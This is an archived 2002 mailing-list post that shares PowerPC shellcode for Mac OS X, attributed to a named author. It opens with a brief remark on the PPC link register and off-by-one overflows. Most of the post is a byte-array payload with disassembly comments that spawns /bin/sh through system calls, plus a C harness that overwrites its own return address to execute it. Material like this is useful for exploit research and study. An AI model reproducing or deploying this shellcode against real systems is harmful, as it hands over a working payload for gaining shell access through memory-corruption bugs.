Here's a sample of ppc shellcode (should work fine on mac os x) on ppc you
have to worry about the link register having the return address, along with
the copy on the stack, so it's not like you can just overwrite it like in
x86. Makes it harder to overflow those off by ones I guess...this was
written by someone named "Chris Shepard" I think:
char shellcode[] =
"\x7c\x08\x02\xa6" /* mflr r0 000 */
"\x7c\x01\x03\x78" /* mr r1,r0 004 */
"\x39\x20\x44\x01" /* li r9,17409 008 */
"\x31\x29\xff\xff" /* addic r9,r9,-1 016 */
"\x39\x40\x01\x04" /* li r10,260 020 */
"\x31\x4a\xfe\xfe" /* addic r10,r10,-258 024 */
"\x30\x41\x01\x74" /* addic r2,r1,372 028 */
"\xb1\x22\xfe\xfc" /* sth r9,-260(r2) 032 */
"\xb1\x42\xfe\xfe" /* sth r10,-258(r2) 036 */
"\x30\x41\x01\x88" /* addic r1,r1,392 040 */
"\xb1\x22\xfe\xfc" /* sth r9,-260(r2) 044 */
"\xb1\x42\xfe\xfe" /* sth r10,-258(r2) 048 */
"\x30\x21\x01\x89" /* addic r1,r1,393 052 */
"\x30\x21\xfe\xff" /* addic r1,r1,-257 056 */
"\x7c\x20\x0b\x78" /* mr r0,r1 060 */
"\x31\x01\x01\x01" /* addic r8,r1,257 064 */
"\x90\x08\xff\x07" /* stw r0,-249(r8) 068 */
"\x7c\x03\x03\x78" /* mr r3,r0 072 */
"\x30\x81\x01\x09" /* addic r4,r1,265 076 */
"\x30\x84\xfe\xff" /* addic r4,r4,-257 080 */
"\x7c\xa5\x2a\x78" /* xor r5,r5,r5 084 */
"\x7c\xc6\x32\x78" /* xor r6,r6,r6 088 */
"\x31\x01\x01\x01" /* addic r8,r1,257 092 */
"\x90\xa8\xff\x0b" /* stw r5,-245(r8) 096 */
"\x7c\xe7\x3a\x78" /* xor r7,r7,r7 100 */
"\x30\xe7\x01\x3c" /* addic r7,r7,268 104 */
"\x30\xe7\xfe\xff" /* addic r7,r7,-257 108 */
"\x7c\xe0\x3b\x78" /* mr r0,r7 112 */
"\x44\xff\xff\xff" /* sc 116 */
"\x7c\xe7\x3a\x78" /* xor r7,r7,r7 120 */
"\x30\xe7\x01\x02" /* addic r7,r7,258 124 */
"\x30\xe7\xfe\xff" /* addfic r7,r7,-257 128 */
"\x7c\xe0\x3b\x78" /* mr r0,r7 132 */
"\x44\xff\xff\xff" /* sc 136 */
"\x2f\x62\x69\x6e\x2f\x73\x68\x00"; /* /bin/sh \x00 144 */
void main() {
int *ret;
ret = (int *)&ret + 8;
(*ret) = (int)shellcode;
printf("Hi there.\n");
}
This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 14:25:02 PST